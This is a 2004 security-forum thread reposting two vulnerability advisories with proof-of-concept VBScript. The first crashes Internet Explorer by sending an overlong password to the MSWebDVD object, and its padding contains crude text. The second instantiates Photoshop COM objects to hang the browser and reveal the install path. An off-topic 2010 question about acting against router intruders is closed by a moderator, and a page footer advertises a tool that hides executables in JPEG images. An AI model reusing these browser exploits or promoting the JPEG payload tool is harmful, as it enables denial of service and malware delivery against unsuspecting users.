Government Security
Network Security Resources

Jump to content

Photo

Mswebdvd Class(mswebdvd.dll) Null Pointer Assignme

- - - - - windows bug exploit vulnerability exploitation denial of service patch
  • This topic is locked This topic is locked
3 replies to this topic

#1 qcred11

qcred11

    First Sergeant

  • Members
  • 2,544 posts

Posted 07 April 2004 - 07:06 AM

[QUOTE]Application: MSWebDVD Class(mswebdvd.dll)
Vendors: http://www.microsoft.com
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser

===============
1) Introduction
===============

"mswebdvd.dll" is module that allows watching DVD films from websites.
Using active scripting an "MSWebDVD.MSWebDVD.1" object can be created
and the user can watch online DVD films .

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The "mswebdvd.dll" module was not correctly designed/checked the parametres
that are
being sent to the "AcceptParentalLevelChange" function. Therefore it is
possible to D.O.S/CRASH
Internet Explorer remotly.

The function :
object = MSWebDVD.MSWebDVD.1
object.AcceptParentalLevelChange (boolean value),UserName as string,Password
as string

Setting the "Password" value with a string longer then 255 chars will cause
the overflow.

Unfortunatly this vulnerability effects all WindowsXP versions after all
patches and after SP1+SP2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
'On Error Resume Next
dim mymy2,a

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA
AAAAAAA"
a= a &
"ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBB
BBBBB"
a= a &
"BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCC
CCCCC"
a= a &
"CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDD
DDDDD"
a= a &
"DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEE
EEEEE"
a= a &
"EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFF
FFFFF"
a= a &
"FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGG
GGGGG"
a= a &
"GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHH
HHHHH"
a= a &
"HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIII
IIIII"
a= a &
"IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJ
JJJJJ"
a= a &
"JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKKKKKKKKKKKKKKKKK
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKKKKKKKKKKKKKKKKKK
KKKKK"
a= a &
"KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLL
LLLLL"
a= a &
"LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMM
MMMMM"
a= a &
"M1234567899876543211112222333344445555666677778888999998761234rafiistheking
ofthebufferoverflows
oyoucansuckmydickcauseiamtheinsiderandiamthebestgolookforyou03923610"
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a

</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#2 qcred11

qcred11

    First Sergeant

  • Members
  • 2,544 posts

Posted 07 April 2004 - 11:28 AM

Almoust same problem was found in Adobe Photoshop 8.0 (CS).
Here the source and explanation:

Adobe Photoshop 8.0 (CS) - Local Path Disclosure and causing I.E

Application: Adobe Photoshop
Vendors: http://www.adobe.com
Version: 8.0 (CS)
Platforms: Windows
Bug: Local Path Disclosure and D.O.S
Risk: Medium - Denial Of Service
Exploitation: Remote with browser



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Adobe Photoshop is one of the worlds best graphic editors.
It has a great set of tools, layer combinations, brushes, amazing software.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Adobe Photoshop registers a lot of COM objects(such as
"Photoshop.Application.8"
and "Photoshop.PhotoCDOpenOptions.8"). These objects are marked as "safe"
for scripting. Therefore they can be created remotely(which is the root of
the problem - they should not!).

Unfortunatly , adobe did not design their object correctly, because upon any
remote
creation of a Photoshop Object a message pops up saying adobe photoshop
security
caught "potential tampering with photoshop", however it also reveals the
local path
of which photoshop was installed in and the Internet Explorer window stops
responding(D.O.S).

For Example:
<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>

Will show where photoshop is installed and that
Internet Explorer window stops responding(D.O.S).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>
------------------- CUT HERE -------------------


Or


------------------- CUT HERE -------------------
<script language=vbscript>
dim cooler
Set cooler = CreateObject("Photoshop.PhotoCDOpenOptions.8" )
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#3 mithsmile

mithsmile

    Private

  • Members
  • 1 posts

Posted 28 December 2010 - 09:56 PM

I currently live in an appartment complex and while looking at my router settings i noticed some computers that were accessing the internet through my router (wireless) that weren't supposed to be. I am planning on to turn the encription on but, I wanted to know if there is anything i can do to them before i do. I have there local ip i just don't know what to do with it.
mithsmile

#4 Edu

Edu

    First Sergeant

  • Members
  • 2,269 posts

Posted 29 December 2010 - 04:33 PM

your matter has nothing to do with this topic subject not to mention you bumped a 6 year old thread. please read our rules and create a topic in the "Networking Security" or "Beginners" section so people can help you.
thanks.

topic closed.
http://www.secumania.net - Secumania security blog.


Embed any executable in a JPEG image and get it to run upon opening the image with this cool tool that abuses a feature of GDI in Windows systems. for governmentsecurity.org members only! click here to get it!





Also tagged with one or more of these keywords: windows, bug, exploit, vulnerability, exploitation, denial of service, patch